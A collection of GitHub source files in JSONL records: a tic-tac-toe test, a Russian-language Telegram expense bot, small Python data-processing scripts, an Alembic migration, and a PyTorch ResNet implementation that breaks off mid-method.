+{"seq_id":"1857530850","text":"import unittest\n\nfrom src.board import Board\n\n\nclass TestBoard(unittest.TestCase):\n def setUp(self):\n self.board = Board()\n self.starter_board = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n self.full_board = [\"X\", \"O\", \"X\", \"O\", \"X\", \"O\", \"X\", \"O\", \"X\"]\n\n def test_board_to_string(self):\n expected_message = f\" {self.starter_board[0]} | {self.starter_board[1]} | {self.starter_board[2]} \\n---+---+---\\n {self.starter_board[3]} | {self.starter_board[4]} | {self.starter_board[5]} \\n---+---+---\\n {self.starter_board[6]} | {self.starter_board[7]} | {self.starter_board[8]}\"\n\n actual_message = self.board.to_string(self.starter_board)\n\n self.assertEqual(expected_message, actual_message)\n\n def test_is_full_returns_true_if_board_is_full(self):\n total_marks_on_board = self.board.count_marks(self.full_board, \"X\", \"O\")\n\n self.assertTrue(self.board.is_full(total_marks_on_board, self.full_board))\n\n def test_is_full_returns_false_if_board_isnt_full(self):\n not_full_board = [\"X\", \"2\", \"3\", \"4\", \"X\", \"O\", \"X\", \"O\", \"X\"]\n total_marks_on_board = self.board.count_marks(not_full_board, \"X\", \"O\")\n\n self.assertFalse(self.board.is_full(total_marks_on_board, not_full_board))\n\n def test_is_full_returns_true_if_board_is_full_with_emojis(self):\n full_board = [\"🤡\", \"👻\", \"🤡\", \"👻\", \"🤡\", \"👻\", \"🤡\", \"👻\", \"🤡\"]\n total_marks_on_board = self.board.count_marks(full_board, \"🤡\", \"👻\")\n\n self.assertTrue(self.board.is_full(total_marks_on_board, full_board))\n\n def test_no_turns_taken_yet(self):\n total_marks_on_board = self.board.count_marks(self.starter_board, \"X\", \"O\")\n\n self.assertEqual(0, total_marks_on_board)\n\n def test_one_turn_taken_returns_one_mark_on_board(self):\n current_board = [\"X\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n total_marks_on_board = self.board.count_marks(current_board, \"X\", \"O\")\n\n self.assertEqual(1, total_marks_on_board)\n\n def test_two_turns_taken_returns_two_marks_on_board(self):\n current_board = [\"X\", \"O\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n total_marks_on_board = self.board.count_marks(current_board, \"X\", \"O\")\n\n self.assertEqual(2, total_marks_on_board)\n\n def test_one_turn_taken_returns_one_mark_on_board_with_emoji(self):\n current_board = [\"1\", \"🤡\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n total_marks_on_board = self.board.count_marks(current_board, \"🤡\", \"👻\")\n\n self.assertEqual(1, total_marks_on_board)\n\n def test_mark_board_marks_board_with_user_selection(self):\n test_mark_one = \"X\"\n test_mark_two = \"O\"\n test_mark_three = \"🤡\"\n expected_board = [\"X\", \"O\", \"X\", \"🤡\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n\n result_one = self.board.mark_board(1, self.starter_board, test_mark_one)\n result_two = self.board.mark_board(2, self.starter_board, test_mark_two)\n result_three = self.board.mark_board(3, self.starter_board, test_mark_one)\n result_four = self.board.mark_board(4, self.starter_board, test_mark_three)\n\n self.assertEqual(expected_board, result_one)\n self.assertEqual(expected_board, result_two)\n self.assertEqual(expected_board, result_three)\n self.assertEqual(expected_board, result_four)\n\n def test_is_spot_taken_returns_true_when_spot_is_taken(self):\n self.assertTrue(\n self.board.is_spot_taken([\"X\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"], 1)\n )\n self.assertTrue(\n self.board.is_spot_taken([\"1\", \"X\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"], 2)\n )\n self.assertTrue(\n self.board.is_spot_taken([\"🤡\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"], 1)\n )\n\n def test_is_spot_taken_returns_false_if_spot_is_not_taken(self):\n test_board = [\"1\", \"X\", \"3\", \"O\", \"X\", \"6\", \"O\", \"8\", \"9\"]\n test_emoji_board = [\"1\", \"🤡\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n\n self.assertFalse(self.board.is_spot_taken(self.starter_board, 1))\n self.assertFalse(self.board.is_spot_taken(test_board, 3))\n self.assertFalse(self.board.is_spot_taken(test_emoji_board, 9))\n","repo_name":"t-keazirian/tic-tac-toe","sub_path":"test/test_board.py","file_name":"test_board.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2118600639","text":"from aiogram import types\nfrom aiogram.utils.markdown import text, italic\nfrom aiogram.utils.emoji import emojize\n\nfrom dispatcher import dp, bot\nimport exceptions\nimport expenses\nimport diagram\nimport keyboards as kb\nfrom categories import Categories\nfrom botDb import BotDB\n\n\n@dp.message_handler(commands=['start'])\nasync def show_today_expenses(message: types.Message):\n \"\"\"Выводит внесенные расходы за день\"\"\"\n if not BotDB().user_exists(message.from_user.id):\n BotDB().add_user(message.from_user.id)\n await send_welcome(message)\n\n\n@dp.message_handler(commands=['help'])\nasync def send_welcome(message: types.Message):\n \"\"\"This handler will be called when user sends `/start` or `/help` command\"\"\"\n await message.answer(text(\n emojize(f\"Бот для учёта финансов :star:\\n\\n\"),\n italic(\"Добавить расход: 999 продукты\\n\"\n \"Сегодняшняя статистика: /today\\n\"\n \"За текущий месяц: /month\\n\"\n \"Последние внесённые расходы: /last\\n\"\n \"Диаграмма расходов: /diagram\\n\"\n \"Установить расход в день: /daily cash\\n\"\n \"Категории трат: /categories\")), parse_mode=types.ParseMode.MARKDOWN)\n\n\n@dp.message_handler(commands=['today'])\nasync def show_today_expenses(message: types.Message):\n \"\"\"Выводит внесенные расходы за день\"\"\"\n answer_message = expenses.get_day_statistics(message.from_user.id)\n await message.answer(answer_message)\n\n\n@dp.message_handler(commands=['month'])\nasync def show_month_expenses(message: types.Message):\n \"\"\"Выводит внесенные расходы за месяц\"\"\"\n month_statistics = expenses.get_month_statistics(message.from_user.id)\n if not month_statistics:\n answer_message = \"В этом месяце нет расходов\"\n await message.answer(answer_message)\n return\n answer_message = f\"Расходы за месяц\\nВсего: {month_statistics}\"\n await message.answer(answer_message, reply_markup=kb.inline_kb_month)\n\n\n@dp.message_handler(commands=['last'])\nasync def list_expenses(message: types.Message):\n \"\"\"Отправляет последние несколько записей о расходах\"\"\"\n last_expenses = expenses.last(message.from_user.id)\n if not last_expenses:\n await message.answer(\"Расходы ещё не заведены\")\n return\n last_expenses_rows = [\n f\"{expense.cash} руб. на {expense.category} — нажми \"\n f\"/del{expense.ex_id} для удаления\"\n for expense in last_expenses]\n answer_message = \"Последние сохранённые траты:\\n\\n* \" + \"\\n\\n* \" \\\n .join(last_expenses_rows)\n await message.answer(answer_message)\n\n\n@dp.message_handler(commands=['daily'])\nasync def daily_expense(message: types.Message):\n \"\"\"Устанавливает базовый расход в день и выводит сообщение\"\"\"\n try:\n answer_message = expenses.set_daily_limit(message.text, message.from_user.id)\n except exceptions.UncorrectMessage as e:\n await message.reply(f'{str(e)}, напиши типо: /daily 500')\n return\n await message.answer(answer_message, parse_mode=types.ParseMode.MARKDOWN)\n\n\n@dp.message_handler(commands=['diagram'])\nasync def show_diagram(message: types.Message):\n \"\"\"Рисует диаграмму расходов\"\"\"\n diagram_name = diagram.save_diagram(message.from_user.id)\n if diagram_name:\n reply_markup = kb.get_diagram_keyboard(message.chat.id)\n await message.answer(\"Diagram\", reply_markup=reply_markup)\n else:\n await message.answer(\"Расходы еще не заведены\")\n\n\n@dp.message_handler(commands=['categories'])\nasync def show_categories(message: types.Message):\n \"\"\"Выводит категории трат\"\"\"\n categories = Categories().get_all_categories()\n answer_message = \"Категории трат:\\n\\n-- \" + \\\n (\"\\n-- \".join([emojize(c.emoji) + ' ' + c.name\n for c in categories]))\n await message.answer(answer_message)\n\n\n@dp.message_handler(lambda message: message.text.startswith('/del'))\nasync def del_expense(message: types.Message):\n \"\"\"Удаляет одну запись о расходе по её идентификатору\"\"\"\n try:\n row_id = int(message.text[4:])\n except ValueError:\n await message.reply(emojize('Не понял :face_with_raised_eyebrow:'))\n return\n expenses.delete_expense(row_id, message.from_user.id)\n answer_message = \"Удалил\"\n await message.answer(answer_message)\n\n\n@dp.message_handler()\nasync def add_expense(message: types.Message):\n \"\"\"Добавляет расход\"\"\"\n try:\n expense = expenses.add_expense(message.text, message.from_user.id)\n except exceptions.UncorrectMessage as e:\n await message.reply(str(e)+', напиши типо: 100 такси')\n return\n answer_message = emojize(f\"Добавил траты: {expense.cash}₽ на {expense.category}:white_check_mark:\\n\") +\\\n expenses.calculate_avalible_expenses(message.from_user.id)\n await message.answer(answer_message, parse_mode=types.ParseMode.MARKDOWN)\n\n\n@dp.message_handler(content_types=types.message.ContentType.ANY)\nasync def unknown_message(msg: types.Message):\n \"\"\"Отвечает на разные типы сообщений\"\"\"\n message_text = emojize(f'Я не знаю, что с этим делать :face_with_symbols_on_mouth:,\\n'\n f'Я просто напомню что есть /help')\n await msg.reply(message_text)\n\n\n@dp.callback_query_handler(text=\"month_expenses\")\nasync def send_month_expenses(call: types.CallbackQuery):\n \"\"\"Выводит суммы расходов по дням\"\"\"\n await call.message.answer(kb.month_btn_data(call.from_user.id))\n await call.answer()\n\n\n@dp.callback_query_handler(kb.callback_data_diagram.filter(filter='diagram_month'))\nasync def send_diagram_month(call: types.CallbackQuery, callback_data: dict):\n \"\"\"Отправляет диаграмму о расходах за месяц\"\"\"\n chat_id = callback_data['chat_id']\n diagram_name = diagram.save_diagram(call.from_user.id, 'month')\n await bot.send_photo(chat_id=chat_id, photo=open(diagram_name, 'rb'),\n caption='Диаграмма за месяц')\n await call.answer()\n diagram.delete_diagram()\n\n\n@dp.callback_query_handler(kb.callback_data_diagram.filter(filter='diagram_year'))\nasync def send_diagram_year(call: types.CallbackQuery, callback_data: dict):\n \"\"\"Отправляет диаграмму о расходах за год\"\"\"\n chat_id = callback_data['chat_id']\n diagram_name = diagram.save_diagram(call.from_user.id, 'year')\n await bot.send_photo(chat_id=chat_id, photo=open(diagram_name, 'rb'),\n caption='Диаграмма за год')\n await call.answer()\n diagram.delete_diagram()\n","repo_name":"Expece/tg-finance-bot","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"11389892934","text":"import urllib.request\n\n# Given two .txt files that have lists of numbers in them,\n# find the numbers that are overlapping.\n\n# IS it betrer to use a function to convert a list to an array of number\ndef file_reader(file_to_read):\n\twith urllib.request.urlopen(file_to_read) as file:\n\t\tline = file.readline()\n\t\tfile_to_read_holder = []\n\t\twhile line:\n\t\t\tfile_to_read_holder.append(line.strip().decode(\"utf-8\"))\n\t\t\tline = file.readline()\n\n\treturn file_to_read_holder\n\t\n# Using list comprehension\ndef check_for_overlapping(list1, list2):\n\treturn print([val for val in list1 if val in list2])\n\n\nif __name__ == '__main__':\n\turl1 = \"http://www.practicepython.org/assets/primenumbers.txt\"\n\turl2 = \"http://www.practicepython.org/assets/happynumbers.txt\"\n\tcheck_for_overlapping(file_reader(url1), file_reader(url2))\n","repo_name":"dtdao/learning-python-django","sub_path":"exercise23.py","file_name":"exercise23.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19464656919","text":"import sys\nfrom collections import defaultdict\n\ndef corpus_iterator(corpus_file):\n\n\tcorpus_list = []\n\tl = corpus_file.readline()\n\twhile l:\n\t\tline = l.strip()\n\t\tif line:\n\t\t\tfields = line.split(\" \")\n\t\t\tne_tag = fields[-1]\n\t\t\tword = \" \".join(fields[:-1])\n\t\t\tcorpus_list.append((word, ne_tag)) \n\t\telse:\n\t\t\tcorpus_list.append((None, None))\n\t\tl = corpus_file.readline()\n\treturn corpus_list\n\ndef count(corpus_iterator):\n\n\tcounter = defaultdict(int)\n\tfor l in corpus_iterator:\n\t\tif l[0]:\n\t\t\tcounter[l[0]] += 1\n\treturn counter\n\ndef write(iterator, counter, output):\n\tfor l in iterator:\n\t\tif l[0]:\n\t\t\tif counter[l[0]] >= 5:\n\t\t\t\toutput.write(\"%s %s\\n\" %(l[0], l[1]))\n\t\t\telse:\n\t\t\t\toutput.write(\"_RARE_ %s\\n\" %l[1])\n\t\telse:\n\t\t\toutput.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv)!=2: \n usage()\n sys.exit(2)\n\n try:\n input = open(sys.argv[1],\"r\")\n except IOError:\n sys.stderr.write(\"ERROR: Cannot read inputfile %s.\\n\" % arg)\n sys.exit(1)\t\n\n\n iterator = corpus_iterator(input)\n counter = count(iterator)\n \n write(iterator, counter, sys.stdout)","repo_name":"chrisyrniu/HMM_Trigram","sub_path":"tag_rare.py","file_name":"tag_rare.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"6692141488","text":"#-----------------------------------------------------\n# Ref YATSM :https://github.com/ceholden/yatsm\n# ----------------------------------------------------\n# Script Name: extractArray.py\n# Author: Suryakant Sawant (suryakant54321@gmail.com)\n# Date: 20 August 2015\n# This script helps to extract data from cache of YATSM :) \n# to increase Time Series analysis capabilities \n# \n# 1. Read all chache files (.npz)\n# 2. Extract usable information\n# \tband number, date, reflectance\n# 3. Write csv file with pixel details \n#\tconvention used for output files\n#\t_.csv \n#\n# \tsimple ! is it !! ?? :) \n# 4. Now you can use output and process it with \n# \tPython / R / Spreadsheets / Matlab\n#\n# Note: If you are successful in running TSTools / YATSM\n#\tin QGIS(i.e. \n#\t\thttps://github.com/ceholden/TSTools or \n#\t\thttps://github.com/ceholden/yatsm\n#\n#\tI am trying to make it more simple. \n#\tSome sections are hard coded (marked with #--*--)\n#-----------------------------------------------------\n#!/bin python2\nimport os, re, gdal\nimport numpy as np\nimport shutil, time\n# To Do : plot values on the fly :)\n#import * from pylab\n#import matplotlib\t\n#\n# Your project path\nos.chdir(\"/media/opengeo-usb/surya2\")\t\t\t\t#--*--\n# cache path\ncacheDir = \"suryaWork/work/8_thermalData/4_tsData/cache\" \t#--*--\ncsvPath = \"suryaWork/work/8_thermalData/6_TimeSeriesOutput\" \t#--*--\ndef extract(cacheDir, csvPath):\n\t#print (cacheDir)\t\n\tallFiles = os.listdir(cacheDir) \n\tcount = 0\n\tfor zipAray in allFiles:\n\t\t#print(zipAray)\n\t\tif zipAray.endswith(\".npz\"):\n\t\t\tfilePath = (\"%s/%s\")%(cacheDir, zipAray)\n\t\t\ta = np.load(filePath)\n\t\t\tprint(\"==========================\\n \\\n\t\t\tProcessing new %s File \")%(zipAray)\n\t\t\tprint (\"Keys = %s\")%(a.keys())\n\t\t\t# ['image_0', 'data_0']\n\t\t\tmetData = a['image_0']\n\t\t\tprint(\"datatype of key image_0 = %s\")%(metData.dtype)\n\t\t\t\"\"\" \n\t\t\t[('filename', 'O'), ('path', 'O'), ('id', 'O'), \n\t\t\t('date', 'O'), ('ordinal', '/subset_LT51450451990031.tif', \n\t\t\t'LT51450451990031', datetime.datetime(1990, 1, 31, 0, 0), 726498L, 31)\n\t\t\t\"\"\"\n\t\t\tdata = a['data_0']\n\t\t\tprint (\"Number of arrays/Bands in data = %s\")%(len(data))\n\t\t\tprint (\"Number of observations for a band = %s\")%(len(data[0]))\n\t\t\tprint (\"shape of data array = \");print(data.shape)\n\t\t\t# Fun Starts here :)\n\t\t\ttData = np.transpose(data)\n\t\t\tprint (\"New shape of data array = \");print(tData.shape)\n\t\t\t#***\n\t\t\tfNames = []\n\t\t\tdateTime = []\n\t\t\tordDay = []\n\t\t\tfor i in range(0,len(metData)):\n \t\t\t\tfNames.append(metData[i][2])\t#--*--\n \t\t\t\tdateTime.append(metData[i][3])\t#--*--\n \t\t\t\tordDay.append(metData[i][4])\t#--*--\t\t\t\n\t\t\tfNames = np.asarray(fNames, dtype=np.str)\n\t\t\tdateTime = np.asarray(dateTime, dtype=np.str)\n\t\t\tordDay = np.asarray(ordDay, dtype=np.str)\n\t\t\tnumRows = len(fNames)\n\t\t\tfNames = fNames.reshape(numRows,1)\n\t\t\tdateTime = dateTime.reshape(numRows,1)\n\t\t\tordDay = ordDay.reshape(numRows,1)\n\t\t\t#***\n\t\t\t# concatenate all arrays. This (#*** to #***) can be done in much better and faster way :)\n\t\t\tallMet = np.concatenate((fNames, dateTime, ordDay, tData), axis=1)\n\t\t\tprint(\"New array shape = \")\t\t\t\n\t\t\tprint(allMet.shape)\n\t\t\tjj = allMet.shape\n\t\t\tcsvFile = re.split('_',zipAray) # x1121y1090_i0n388b8.npz\n\t\t\tcsvFile = (\"%s_r%sc%s.csv\")%(csvFile[0],jj[0], jj[1])\n\t\t\tcsvFile = (\"%s/%s\")%(csvPath, csvFile)\n\t\t\tnp.savetxt(csvFile, allMet, delimiter=',', fmt='%19s', header='name, date, ordate, b, g, r, nir, swir1, swir2, cfmask, thermal')\n\t\t\t#print (\"Array %s available\")%(zipAray) \n#--\nextract(cacheDir, csvPath)\n#\n","repo_name":"suryakant54321/basicDataPrep","sub_path":"extractArray.py","file_name":"extractArray.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"10637849630","text":"import sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"028ec0c3c704\"\ndown_revision = \"4b5532b0ac1e\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"project\", sa.Column(\"config\", sa.JSON(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"project\", \"config\")\n # ### end Alembic commands ###\n","repo_name":"project-chip/certification-tool-backend","sub_path":"alembic/versions/028ec0c3c704_add_project_config.py","file_name":"028ec0c3c704_add_project_config.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"19528318461","text":"__all__ = ['ResNet']\n\n\nimport re\nimport torch.nn as nn\nfrom functools import partial\nfrom ...operators import get_gapool_op, get_flatten_op\n\n\n# 从bag_of_tricks论文划分,3类skip connection:\n# 1. ideneity\n# 2. 原始ResNet的conv downsample\n# 3. Bag of Tricks的avgpool downsample\n# 从pre-act与否划分,2类skip connection:\n# 1. 原始ResNet的post-activation模式,weight-bn-relu,最后的relu跟外面的block共享,略去,只剩weight-bn\n# 2. pre-activation模式,bn-relu-conv,最前面的bn-relu跟外面的block共享,略去,只剩weight\ndef skip_connection(in_channels, out_channels, stride, avg_down, pre_act):\n if in_channels == out_channels and stride == 1:\n return nn.Sequential()\n elif stride == 1 or not avg_down:\n if not pre_act:\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 1, stride, bias=False),\n nn.BatchNorm2d(out_channels),\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 1, stride, bias=False),\n )\n else:\n if not pre_act:\n return nn.Sequential(\n nn.AvgPool2d(stride, stride, ceil_mode=True, count_include_pad=False),\n nn.Conv2d(in_channels, out_channels, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n )\n else:\n return nn.Sequential(\n nn.AvgPool2d(stride, stride, ceil_mode=True, count_include_pad=False),\n nn.Conv2d(in_channels, out_channels, 1, 1, bias=False),\n )\n\n\nclass SqueezeExcitation(nn.Module):\n\n def __init__(self, channels, ratio=16):\n super(SqueezeExcitation, self).__init__()\n self.avgpool = get_gapool_op()\n neck_channels = max(1, channels // ratio)\n self.mlp = nn.Sequential(\n nn.Conv2d(channels, neck_channels, kernel_size=1, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(neck_channels, channels, kernel_size=1, bias=False),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n w = self.avgpool(x)\n w = self.mlp(w)\n return w * x\n\n\nclass BasicBlockV1(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=None, num_groups=1, avg_down=False, neck_down=None):\n super(BasicBlockV1, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, out_channels, 3, stride, 1, bias=False)\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False, groups=num_groups)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=False)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out += self.skip(x)\n out = self.relu2(out)\n return out\n\n\nclass BasicBlockV2(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=None, num_groups=1, avg_down=False, neck_down=None):\n super(BasicBlockV2, self).__init__()\n self.bn1 = nn.BatchNorm2d(in_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv1 = nn.Conv2d(in_channels, out_channels, 3, stride, 1, bias=False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False, groups=num_groups)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=True)\n\n def forward(self, x):\n x = self.bn1(x)\n x = self.relu1(x)\n out = self.conv1(x)\n out = self.bn2(out)\n out = self.relu2(out)\n out = self.conv2(out)\n out += self.skip(x)\n return out\n\n\nclass BottleneckV1(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=4, num_groups=1, avg_down=False, neck_down=False):\n super(BottleneckV1, self).__init__()\n neck_channels = round(out_channels / shrink)\n if not neck_down:\n in_stride, neck_stride = stride, 1\n else:\n in_stride, neck_stride = 1, stride\n\n self.conv1 = nn.Conv2d(in_channels, neck_channels, 1, in_stride, 0, bias=False)\n self.bn1 = nn.BatchNorm2d(neck_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(neck_channels, neck_channels, 3, neck_stride, 1, bias=False, groups=num_groups)\n self.bn2 = nn.BatchNorm2d(neck_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(neck_channels, out_channels, 1, bias=False)\n self.bn3 = nn.BatchNorm2d(out_channels)\n self.relu3 = nn.ReLU(inplace=True)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=False)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu2(out)\n out = self.conv3(out)\n out = self.bn3(out)\n out += self.skip(x)\n out = self.relu3(out)\n return out\n\n\nclass BottleneckV2(nn.Module):\n\n def __init__(self, in_channels, out_channels, stride, shrink=4, num_groups=1, avg_down=False, neck_down=False):\n super(BottleneckV2, self).__init__()\n neck_channels = round(out_channels / shrink)\n if not neck_down:\n in_stride, neck_stride = stride, 1\n else:\n in_stride, neck_stride = 1, stride\n\n self.bn1 = nn.BatchNorm2d(in_channels)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv1 = nn.Conv2d(in_channels, neck_channels, 1, in_stride, 0, bias=False)\n self.bn2 = nn.BatchNorm2d(neck_channels)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(neck_channels, neck_channels, 3, neck_stride, 1, bias=False, groups=num_groups)\n self.bn3 = nn.BatchNorm2d(neck_channels)\n self.relu3 = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(neck_channels, out_channels, 1, bias=False)\n self.skip = skip_connection(in_channels, out_channels, stride, avg_down, pre_act=True)\n\n def forward(self, x):\n x = self.bn1(x)\n x = self.relu1(x)\n out = self.conv1(x)\n out = self.bn2(out)\n out = self.relu2(out)\n out = self.conv2(out)\n out = self.bn3(out)\n out = self.relu3(out)\n out = self.conv3(out)\n out += self.skip(x)\n return out\n\n\ndef init_weight(module):\n nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu')\n\n\ndef input_stem(in_channels, out_channels, deep_stem, narrow_stem):\n stem = []\n if (deep_stem, narrow_stem) == (False, False):\n stem.append(nn.Conv2d(in_channels, out_channels, 7, 2, 3, bias=False))\n elif (deep_stem, narrow_stem) == (False, True):\n stem.append(nn.Conv2d(in_channels, out_channels, 3, 2, 1, bias=False))\n elif (deep_stem, narrow_stem) == (True, True):\n neck_channels = out_channels // 2\n stem.append(nn.Conv2d(in_channels, neck_channels, 3, 2, 1, bias=False))\n stem.append(nn.BatchNorm2d(neck_channels))\n stem.append(nn.ReLU(inplace=True))\n stem.append(nn.Conv2d(neck_channels, neck_channels, 3, 1, 1, bias=False))\n stem.append(nn.BatchNorm2d(neck_channels))\n stem.append(nn.ReLU(inplace=True))\n stem.append(nn.Conv2d(neck_channels, out_channels, 3, 1, 1, bias=False))\n else:\n raise ValueError('deep and wide stem is not supported')\n stem.append(nn.BatchNorm2d(out_channels))\n stem.append(nn.ReLU(inplace=True))\n stem.append(nn.MaxPool2d(3, 2, 0, ceil_mode=True))\n return nn.Sequential(*stem)\n\n\ndef residual_stem(block, in_channels, out_channels, layers, stride):\n if layers == 0:\n return nn.Sequential()\n seq = []\n seq.append(block(in_channels, out_channels, stride))\n for i in range(1, layers):\n seq.append(block(out_channels, out_channels, 1))\n return nn.Sequential(*seq)\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, layers, base_channels, bottleneck,\n shrink=4, num_groups=1,\n deep_stem=False, narrow_stem=False, pre_act=False,\n use_se=False, avg_down=False, neck_down=False, zero_gamma=False,\n num_classes=1000):\n super(ResNet, self).__init__()\n if len(layers) < 2:\n raise ValueError('len(layers) = {} < 2'.format(len(layers)))\n self.num_layers = len(layers)\n\n if not bottleneck:\n mul = [1, 1]\n else:\n mul = [1, 4]\n for _ in range(len(layers) - 1):\n mul.append(mul[-1] * 2)\n channels = [m * base_channels for m in mul]\n\n self.input_stem = input_stem(3, channels[0], deep_stem, narrow_stem)\n Block = {\n (False, False): BasicBlockV1,\n (False, True): BasicBlockV2,\n (True, False): BottleneckV1,\n (True, True): BottleneckV2,\n }[(bottleneck, pre_act)]\n block = partial(Block, shrink=shrink, num_groups=num_groups, avg_down=avg_down, neck_down=neck_down)\n self.layer1 = residual_stem(block, channels[0], channels[1], layers[0], stride=1)\n for i in range(len(layers) - 1):\n lay = layers[i + 1]\n in_ch = channels[i + 1]\n out_ch = channels[i + 2]\n self.add_module('se{}'.format(i + 1), SqueezeExcitation(in_ch) if use_se else nn.Sequential())\n self.add_module('layer{}'.format(i + 2), residual_stem(block, in_ch, out_ch, lay, stride=2))\n\n if not pre_act:\n self.output_stem = nn.Sequential()\n else:\n self.output_stem = nn.Sequential(\n nn.BatchNorm2d(channels[4]),\n nn.ReLU(inplace=True),\n )\n self.avgpool = get_gapool_op(7)\n self.view = get_flatten_op()\n self.fc = nn.Linear(channels[-1], num_classes)\n\n # initialize\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init_weight(m)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n if zero_gamma:\n for i, layer in enumerate([self.layer1, self.layer2, self.layer3, self.layer4]):\n for j, block in enumerate(layer):\n if type(block) in (BasicBlockV1, BasicBlockV2):\n block.bn2.weight.data.zero_()\n elif type(block) in (BottleneckV1, BottleneckV2):\n block.bn3.weight.data.zero_()\n elif type(block) == SqueezeExcitation:\n pass\n else:\n raise RuntimeError('layer {} block {} has unknown type for zero_gamma: {}'.format(\n i, j, type(block)))\n\n def forward(self, x, forward_mode='cls'):\n if forward_mode == 'cls':\n return self.forward_cls(x)\n if forward_mode == 'det':\n return self.forward_det(x)\n raise ValueError('unknown forward_mode: {}'.format(forward_mode))\n\n def forward_cls(self, x):\n x = self.input_stem(x)\n x = self.layer1(x)\n for i in range(self.num_layers - 1):\n x = getattr(self, 'se{}'.format(i + 1))(x)\n x = getattr(self, 'layer{}'.format(i + 2))(x)\n x = self.output_stem(x)\n x = self.avgpool(x)\n x = self.view(x)\n x = self.fc(x)\n return x\n\n def forward_det(self, x):\n x = self.input_stem(x)\n feature_maps = [x]\n x = self.layer1(x)\n for i in range(self.num_layers - 1):\n x = getattr(self, 'se{}'.format(i + 1))(x)\n x = getattr(self, 'layer{}'.format(i + 2))(x)\n feature_maps.append(x)\n return tuple(feature_maps)\n\n def get_cls_head(self):\n return self.fc\n\n def only_keep_cls_backbone(self):\n self.fc = nn.Sequential()\n return self\n\n def only_keep_cnn_backbone(self):\n self.avgpool = nn.Sequential()\n self.view = nn.Sequential()\n self.fc = nn.Sequential()\n return self\n\n def change_output_classes(self, num_classes, keep_if_same=True):\n if not isinstance(self.fc, nn.Linear):\n raise NotImplementedError('Now self.fc is not nn.Linear.')\n if num_classes != self.fc.out_features or not keep_if_same:\n fc = nn.Linear(self.fc.in_features, num_classes)\n init_weight(fc)\n if self.fc.weight.is_cuda:\n fc.cuda(self.fc.weight.device)\n assert fc.weight.device == self.fc.weight.device\n self.fc = fc\n return self\n\n def change_input_channels(self, in_channels):\n old_conv = self.input_stem[0]\n if in_channels != old_conv.in_channels:\n new_conv = nn.Conv2d(\n in_channels, old_conv.out_channels,\n old_conv.kernel_size, old_conv.stride, old_conv.padding,\n old_conv.dilation,\n old_conv.groups,\n old_conv.bias is not None,\n old_conv.padding_mode,\n )\n init_weight(new_conv)\n if 